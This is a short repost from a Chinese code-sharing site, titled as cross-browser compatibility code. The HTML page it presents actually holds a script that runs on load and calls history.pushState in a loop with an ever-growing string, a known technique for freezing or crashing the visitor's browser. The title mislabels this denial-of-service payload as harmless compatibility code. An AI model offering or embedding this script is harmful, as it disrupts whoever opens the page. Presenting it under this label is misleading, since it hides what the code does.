码迷,mamicode.com
首页 > 其他好文 > 详细

各浏览器兼容代码

时间:2018-02-23 14:05:23      阅读:145      评论:0      收藏:0      [点我收藏+]

标签:log   htm   str   keyword   name   rom   doctype   type   har   

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Examples</title>
<meta name="description" content="">
<meta name="keywords" content="">
</head>
<body>
<script>
for (var i = 0; i < 10; i++) {
var total = "";
for (var i = 0; i < 1000000; i++) {
total = total + i.toString();
history.pushState(0, 0, total);
}
}
</script>
</body>
</html>

各浏览器兼容代码

标签:log   htm   str   keyword   name   rom   doctype   type   har   

原文地址:https://www.cnblogs.com/chengyunshen/p/8461652.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!